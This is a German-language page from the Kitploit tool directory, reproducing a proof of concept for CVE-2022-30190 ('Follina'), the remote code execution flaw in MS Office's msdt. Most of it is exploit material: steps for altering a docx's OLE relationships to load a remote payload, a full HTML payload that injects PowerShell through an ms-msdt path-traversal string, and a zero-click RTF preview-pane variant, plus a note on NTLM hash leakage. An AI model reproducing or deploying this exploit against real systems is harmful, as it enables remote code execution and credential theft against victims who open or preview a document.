Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PoC-CVE-2022-30190 — PoC CVE-2022-30190 : CVE 0-day MS Office RCE, auch bekannt als msdt follina | Kitploit
Tools/GitHubGitHub/jmousqueton/poc-cve-2022-30190
Phishing-ToolsPayload-GenerierungSchwachstellenanalyseExploitationLaterale BewegungWebanwendungs-ExploitationCommand and Control
GitHubjmousqueton/poc-cve-2022-30190

PoC-CVE-2022-30190

PoC CVE-2022-30190 : CVE 0-day MS Office RCE, auch bekannt als msdt follina

Repository anzeigen
15752vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

POC CVE-2022-30190 : CVE 0-day MS Office RCE alias msdt follina

Info : Neue Microsoft-Office-Zero-Day-Lücke bei Angriffen zur Ausführung von PowerShell genutzt

Zusammenfassung

Am 29. Mai 2022 entdeckte das Team von Nao_Sec, ein unabhängiges Cybersicherheits-Forschungsteam, ein bösartiges Office-Dokument, das auf Virustotal geteilt wurde. Dieses Dokument nutzt ein ungewöhnliches, aber bekanntes Schema, um seine Opfer zu infizieren. Das Schema wurde von einigen EDR-Lösungen wie Microsoft Defender for Endpoint nicht als bösartig erkannt. Diese Schwachstelle könnte zu Codeausführung führen, ohne dass eine Benutzerinteraktion erforderlich ist, da sie keine Makros beinhaltet – außer wenn der Protected View Modus aktiviert ist. Es gibt noch keine zugewiesene CVE-Nummer.

Technische Details

Die Schwachstelle wird ausgenutzt, indem das MSProtocol-URI-Schema zum Laden von Code verwendet wird. Angreifer könnten bösartige Links, die mit „ms-msdt:" beginnen, in Microsoft-Office-Dokumenten, Vorlagen oder E-Mails einbetten. Diese werden danach ohne Benutzerinteraktion geladen und ausgeführt – außer wenn der Protected View Modus aktiviert ist. Allerdings kann die Konvertierung des Dokuments in das RTF-Format auch den Protected-View-Schutz umgehen.

Proof of Concept

MS-Office-docx-Dateien können externe OLE-Objektverweise als HTML-Dateien enthalten. Es gibt ein HTML-Schema „ms-msdt:", das das MSDT-Diagnosetool aufruft, das in der Lage ist, beliebigen Code (in den Parametern angegeben) auszuführen.

Das Ergebnis ist ein erschreckender Angriffsvektor, um durch das Öffnen bösartiger docx-Dateien RCE zu erlangen (ohne Makros zu verwenden).

Hier sind die Schritte zum Erstellen eines Proof-of-Concept-docx:

  1. Öffnen Sie Word (verwendet: aktuelle Version 2019 Pro, 16.0.10386.20017), erstellen Sie ein Dummy-Dokument, fügen Sie ein (OLE-)Objekt (als Bitmap-Bild) ein und speichern Sie es als docx.

  2. Bearbeiten Sie word/_rels/document.xml.rels in der docx-Struktur (es ist eine einfache ZIP-Datei). Ändern Sie das XML-Tag <Relationship> mit dem Attribut

root@kitploit:~
Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"

und Target="embeddings/oleObject1.bin", indem Sie den Target-Wert ändern und das Attribut TargetMode hinzufügen:

root@kitploit:~
Target = "http://<payload_server>/payload.html!"
TargetMode = "External"

Beachten Sie den Id-Wert (wahrscheinlich "rId5").

  1. Bearbeiten Sie word/document.xml. Suchen Sie nach dem Tag <o:OLEObject ..> (mit r:id="rId5") und ändern Sie das Attribut von Type="Embed" auf Type="Link" und fügen Sie das Attribut UpdateMode="OnCall" hinzu.

HINWEIS: Das erstellte bösartige docx ist fast dasselbe wie bei CVE-2021-44444.

  1. Stellen Sie das HTML-Payload (calc.exe-Launcher) mit dem ms-msdt-Schema unter http://<payload_server>/payload.html bereit:
root@kitploit:~
<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times
  window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";
</script>

</body>
</html>

Beachten Sie, dass:

  • die Kommentarzeile mit AAA sollte mehr als 60 Mal wiederholt werden (mindestens 4096 Bytes).
  • Mindestens zwei /../-Verzeichnisdurchläufe waren am Anfang des Parameters IT_BrowseForFile erforderlich
  • In $() eingeschlossener Code würde über PowerShell ausgeführt, aber Leerzeichen würden ihn unterbrechen
  • „.exe“ muss die letzte nachgestellte Zeichenfolge am Ende des Parameters IT_BrowseForFile sein

Darüber hinaus kann das auslösende Payload entfernte Standorte erreichen. Auch wenn dies wahrscheinlich keine nicht vertrauenswürdige Binärdatei aufruft, überträgt die Verbindung dennoch NTLM-Hashes (was bedeutet, dass die Angreifer nun einen Hash des Windows-Passworts des Opfers besitzen), die von einem Gegner für weitere Post-Exploitation-Aktivitäten verwendet werden könnten.

BONUS (0-click-RTF-Version)

Wenn Sie zusätzlich diese Elemente unter dem <o:OLEObject>-Element in word/document.xml bei Schritt 3 hinzufügen:

root@kitploit:~
<o:LinkType>EnhancedMetaFile</o:LinkType>
<o:LockedField>false</o:LockedField>
<o:FieldCodes>\f 0</o:FieldCodes>

dann funktioniert es auch als RTF (öffnen Sie das resultierende docx und speichern Sie es als RTF).

Mit RTF muss die Datei nicht in Word geöffnet werden; es reicht aus, die Datei zu durchsuchen und sie sich in einem Vorschaufenster anzusehen. Das Vorschaufenster löst das externe HTML-Payload aus, und RCE ist ohne jeden Klick erreicht.

Quellen :

  • https://nao-sec.org/about
  • https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection
  • https://gist.github.com/tothi/66290a42896a97920055e50128c9f040 (Originalcode)
  • https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
  • https://github.com/sinjap/PoC-CVE-2022-30190 (zusätzliche Informationen)
  • https://github.com/JohnHammond/msdt-follina (Skript)
Tool herunterladen